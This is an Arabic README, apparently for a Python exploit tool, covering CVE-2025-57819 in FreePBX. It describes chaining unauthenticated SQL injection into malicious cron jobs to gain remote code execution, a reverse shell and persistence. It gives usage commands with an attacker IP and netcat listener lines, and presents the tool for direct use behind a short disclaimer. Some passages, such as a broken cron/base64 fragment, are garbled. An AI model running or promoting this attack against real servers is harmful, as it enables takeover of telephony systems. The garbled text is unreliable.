
استغلال بلغة Python لـ CVE-2025-57819 يستهدف FreePBX عبر حقن SQL غير مصادق عليه لتحقيق تنفيذ التعليمات البرمجية عن بُعد مع شل عكسي تلقائي واستمرارية عبر cron.
< 15.0.66, < 16.0.89 و < 17.0.3يستغل هذا البرنامج النصي CVE-2025-57819 في وحدة نقطة نهاية ضعيفة في FreePBX. تسمح الثغرة بحقن SQL، والتي يتم استغلالها لحقن مهام cron خبيثة.
لا توجد أي خطوات إضافية ضرورية كما في الاستغلالات العامة الأخرى التي تتطلب التفاعل مع صدفة ويب مرفوعة على الهدف. إنه نهج مباشر يمنحك وصولًا مباشرًا إلى صدفة عكسية.
يتم تحقيق تنفيذ الكود عن بُعد من خلال حقن SQL والتلاعب بمهام cron. يؤدي الاستغلال الناجح إلى صدفة عكسية على النظام المستهدف. اعتمادًا على الإعدادات، قد يؤدي هذا إلى اختراق كامل للنظام.
* * * * *)base64 تتلف عندما يتم تفسير أحرف + على أنها مسافات.شغّل الاستغلال بتوفير الهدف وإعدادات المستمع:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: اسم المضيف أو عنوان IP الخاص بالهدف (مثيل FreePBX ضعيف)<lhost>: عنوان IP الخاص بالمهاجم لاستقبال اتصال الصدفة العكسية<lport>: منفذ الاستماع للاتصال الواردpython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
ابدأ مستمعًا قبل تنفيذ الاستغلال:
nc -lvnp <port>
nc -nlvp 9999
هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه الأداة.
Its1Zero - [email protected]